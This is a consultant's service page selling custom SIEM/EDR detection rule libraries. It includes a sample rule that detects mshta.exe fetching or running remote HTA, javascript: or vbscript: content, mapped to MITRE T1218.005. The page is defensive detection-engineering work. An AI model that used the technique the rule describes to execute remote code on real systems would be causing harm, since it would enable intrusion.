← All services

Detection Rule Library

Production-ready detections written for your platform

You tell me your SIEM/EDR platform and your top threat concerns. I deliver a library of production-ready detection rules grounded in real-world experience, not generic templates pulled from a blog post. Each rule includes MITRE ATT&CK mapping, tuning guidance, and false positive documentation so your team can deploy with confidence.

Deliverables

  • Git repo with 30–50 detection rules for your platform (Splunk, CrowdStrike, Elastic, SentinelOne, Sigma, and others)
  • Each rule includes detection logic, description, severity, MITRE mapping, and tuning notes
  • Coverage summary mapping delivered rules to ATT&CK techniques
  • One round of revisions after your team reviews

How It Works

1

Scoping call

We discuss your platform, telemetry sources, top threat concerns, and any existing detection coverage you want to build on.

2

Research & development

I research the threat landscape relevant to your environment and write detection rules tailored to your telemetry, platform, and attack surface.

3

Delivery & review

You receive a git repo with all rules, documentation, and a coverage map. Your team reviews and I incorporate one round of feedback.

What a Rule Looks Like

title: Mshta.exe Executing Remote HTA Payload
status: production
severity: high
mitre:
  - T1218.005  # Signed Binary Proxy Execution: Mshta

detection:
  process_name: mshta.exe
  command_line contains any:
    - "http://"
    - "https://"
    - "javascript:"
    - "vbscript:"
  filter:
    parent_process: msiexec.exe
    command_line contains: "res://"

description: >
  Detects mshta.exe fetching or executing remote content.
  Mshta is a signed Microsoft binary rarely used in normal
  operations but frequently abused to proxy execution of
  malicious HTA files and inline scripts.

tuning_notes: >
  Legitimate use is uncommon. Some legacy installers invoke
  mshta via msiexec, handled by the filter above. Monitor
  for new parent processes before adding exclusions.

false_positives:
  - Legacy MSI installers rendering HTML-based dialogs

Every rule in the library follows this structure: clear logic, context your analysts need, and practical tuning guidance.

Timeline

3–4 weeks

Pricing

Starting at $8K

What You Provide

Your SIEM/EDR platform, top threat concerns, and telemetry field documentation

Ready to get started?